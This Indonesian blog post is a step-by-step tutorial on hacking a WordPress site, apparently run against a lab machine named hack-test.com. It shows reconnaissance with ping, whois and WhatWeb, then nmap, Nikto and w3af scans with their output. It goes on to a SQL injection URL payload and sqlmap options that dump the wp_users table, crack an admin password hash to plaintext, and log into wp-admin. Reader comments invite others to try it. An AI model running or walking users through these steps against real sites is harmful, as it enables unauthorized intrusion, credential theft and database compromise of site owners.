Jawaban atas pertanyaan ini mungkin sulit untuk menentukan, hanya karena ada begitu banyak cara untuk hack sebuah situs. Tujuan kami dalam artikel ini untuk menunjukkan kepada Anda teknik yang paling banyak digunakan oleh hacker dalam penargetan dan hacking situs Anda!
Mari kita kira bahwa ini adalah situs Anda: hack-test.com
Mari kita ping situs ini untuk mendapatkan IP server :
Sekarang kita memiliki 173.236.138.113 - ini adalah IP server di mana situs target kami host. Untuk menemukan situs lain host di server yang sama, kita akan menggunakan sameip.org :
26 website lain host di server ini [173.236.138.113]. Banyak hacker akan menargetkan semua situs lain pada server yang sama untuk hack situs Anda. Tapi untuk tujuan penelitian, kita akan menargetkan situs Anda saja dan mengesampingkan hacking situs lain pada server yang sama.
Kita akan memerlukan informasi lebih lanjut tentang situs Anda, seperti:
- DNS records (A, NS, TXT, MX and SOA)
- Web Server Type (Apache, IIS, Tomcat)
- Registrar (Perusahaan yang memiliki Domain Anda)
- Your name, address, email and phone
- Scripts that your site uses (php, asp, asp.net, jsp, cfm)
- Your server OS (Unix, Linux, Windows, Solaris)
- Your server open ports to internet (80, 443, 21, etc.)
Mari kita menentukan jenis server web :
Seperti yang Anda lihat, server situs web Anda adalah Apache. Kami akan menentukan versi kemudian.
Sekarang saatnya untuk menemukan Domain Registrar Anda dan nama Anda, alamat, email dan telepon :
Kami sekarang punya registrar Anda dan informasi penting lain tentang Anda. Kita bisa menemukan jenis script di situs Anda (jenis OS, versi web server) dengan menggunakan alat keren di backtrack 5 R1 disebut Whatweb :
Sekarang kami menemukan bahwa situs Anda menggunakan script php terkenal yang disebut WordPress, bahwa server os Fedora Linux dan versi web server Anda (apache 2.2.15), mari kita menemukan port terbuka di server Anda.
Untuk melakukan hal ini, kita akan menggunakan nMap:
1 – Cari layanan yang berjalan di server
root@bt:/# nmap -sV hack-test.com2 – Menemukan server OS
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
root@bt:/# nmap -O hack-test.comPort hanya 80 terbuka dan OS adalah Linux 2.6.22 (Fedora Core 6)
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
Sekarang kita telah mengumpulkan semua informasi penting tentang situs Anda, mari kita scan untuk kerentanan seperti Sql injection - Blind sql injection - LFI - RFI - XSS - CSRF, dan sebagainya.
Kami akan menggunakan Nikto.pl untuk mengumpulkan info:
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Kami juga akan menggunakan W3AF. Anda dapat menemukan alat ini di Backtrack 5 R1
root@bt:/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
Kami akan memasukkan URL situs Anda dan memilih opsi audit yang lengkap:
Setelah beberapa waktu, scan akan selesai dan Anda akan melihat
Situs Anda rentan terhadap XSS sql injection, dan lain-lain!
Mari kita menyelidiki kerentanan injeksi sql:
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
Ini adalah url yang vuln dan cat adalah parameter yang vuln.
Jadi, mari kita mengeksploitasi celah ini:
Kita akan menemukan bahwa mengeksploitasi vuln ini gagal, jadi kita akan menggunakan sqlmap untuk pekerjaan dan dump semua database informasi yang kita butuhkan untuk hack situs ini.
Pakai sqlmap dengan –u url
Setelah beberapa detik Anda akan melihat
Ketik N dan Tekan Enter untuk melanjutkan
Seperti yang Anda lihat situs Anda rentan terhadap kesalahan-berbasis sql injection dan Anda versi database mysql adalah 5. Mari kita menemukan semua database di situs Anda dengan menambahkan "–dbs"
Sekarang kita menemukan 3 databases
Kami akan membuang tabel database wordpress dengan menambahkan "–D wordpress –tables"
Kita akan menemukan semua tabel wordpress
Kami ingin membuang table "wp_users", jadi kita akan menemukan semua pengguna (admin?) informasi (user id dan password hash) dan mencoba untuk memecahkan hash dan masukkan panel kontrol wordpress (wp-admin).
Kami akan kolom tabel "wp_users" dengan menambahkan "-T wp_users –columns"
Kami akan mencari 22 kolom
Kita hanya perlu dump untuk kolom, jadi kita akan membuang tabel (user_login dan user_pass) dengan menambahkan -C user_login,user_pass –dump.
Kita akan menemukan informasi penting, dan menemukan users dan hash password
Tapi kami ingin mengcrack hash untuk menghapus password teks. Kami akan menggunakan situs online http://www.onlinehashcrack.com/free-hash-reverse.php
Dan mencoba untuk memecahkan hash ini 7CBB3252BA6B7E9C422FAC5334D22054
Dan password teks yang jelas adalah q1w2e3
Dan usernamenya adalah "GeorgeMiller"
Kami akan login dengan rincian ini di "wp-admin"
Dan kami bisa masuk!
Lanjutannya ada di halaman berikutnya, DISINI!
3 komentar
Waoww. . .
cukup membuat ku pusing >.<
haha iya, lain kali kalo ada waktu silahkan dicoba :D
Yoshh !!!
Biasakan sebelum berkomentar, bagikan link ke teman anda untuk membantu kami membuat artikel lainnya yang bermanfaat. Komentar yang kami balas hanya yang berguna dan bermanfaat.
Emoticon Emoticon